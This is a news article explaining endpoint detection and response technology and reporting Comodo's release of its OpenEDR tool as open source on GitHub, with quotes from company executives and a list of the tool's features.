Endpoint detection and response (EDR) is a cyber technology that continually monitors and responds to suspicious activities on hosts.
Sometimes compared to Advanced Threat Protection (ATP) in terms of overall security capabilities, EDR works on the endpoints, in order to detect and response to threats and traces of threats on network events. It records the information in a central database where further analysis, detection, investigation, reporting, and alerting take place.
EDR is usually made available by cybersecurity solutions by having the agent installed on the host system.
And here, Comodo Security, the creator of Comodo Internet Security (CIS), the freemium internet security suite that includes an antivirus program, personal firewall, sandbox, host-based intrusion prevention system (HIPS) and Website Filtering, becomes the first major cybersecurity company that open-sourced own EDR tool.
Calling it the OpenEDR, the tool has been made available for free on GitHub.
This followed its plans to move to open source back in September.
Creators of EDR technology deploy their tools to gather data from endpoint devices, and then analyze the data to find potential cyber threats and issues.
EDR is commonly used as a protection against hacking attempts and theft of user data.
After successful installation, the agent will work on the end-user device, allowing continuous monitoring of the system.
The approach is that, any of its finding will be stored inside a centralized database, so in case an incident is found, the end-user is immediately prompted with preventive list of actions.
Every EDR platform has its unique set of capabilities.
However, some common capabilities include the monitoring of endpoints in both the online and offline mode, responding to threats in real-time, increasing visibility and transparency of user data, detecting store endpoint events and malware injections, creating blacklists and whitelist, and integration with other technologies.
EDRs are considered the next step in the evolution of antivirus software: when traditional antivirus software is designed to block malware when it executes, EDRs take a more proactive approach.
The reason Comodo open-sourced its popular tool, is because it concluded that competitors' EDR solutions fall short of protecting customers, and then charge additional for EDR capability.
"We are offering our EDR as open source because we feel strongly that as cyber-threats increase, every company should have access to this capability regardless of budget or ability to purchase it," said Alan Knepfer, President and Chief Revenue Officer at Comodo, said back in September.
"Our competitors offer endpoint protection that falls short of protecting customers, and then charge additional for EDR capability. This kind of pricing strategy from cybersecurity vendors will weaken the cybersecurity resources available to enterprises," Knepfer added.
"The model of charging for multiple layers because they fail in protecting customers is not a healthy business model for the long term. We are putting an end to that by open sourcing the world’s most sophisticated EDR," Comodo said in a post.
Comodo's open-sourced OpenEDR has all of the basic functionality of an EDR.
For example, it includes the ability to roll out custom detection rules and IOCs, real-time monitoring of workstation filesystems, detection of fileless threats, a recommendation engine that advises of measures that need to be taken, a GUI, and a threats vector investigation capability.